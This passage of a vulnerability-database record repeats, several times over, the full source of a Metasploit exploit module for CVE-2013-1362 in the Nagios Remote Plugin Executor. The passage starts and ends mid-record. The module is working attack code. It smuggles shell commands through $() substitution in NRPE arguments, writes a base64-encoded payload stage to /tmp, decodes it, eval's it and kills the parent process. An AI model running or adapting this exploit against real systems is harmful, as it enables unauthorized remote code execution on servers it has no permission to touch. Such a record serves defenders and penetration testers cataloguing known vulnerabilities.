even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-16T13:54:55", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-16T13:54:55"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-16T13:54:55", "differentElements": ["modified", "published"], "edition": 49}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-17T11:49:13", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-17T11:49:13"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-17T11:49:13", "differentElements": ["modified", "published"], "edition": 50}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-17T13:47:51", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-17T13:47:51", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-17T13:47:51", "differentElements": ["modified", "published"], "edition": 51}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-19T19:54:05", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-19T19:54:05", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-19T19:54:05", "differentElements": ["modified", "published"], "edition": 52}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-19T21:56:07", "history": [], "viewCount": 82, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-19T21:56:07", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 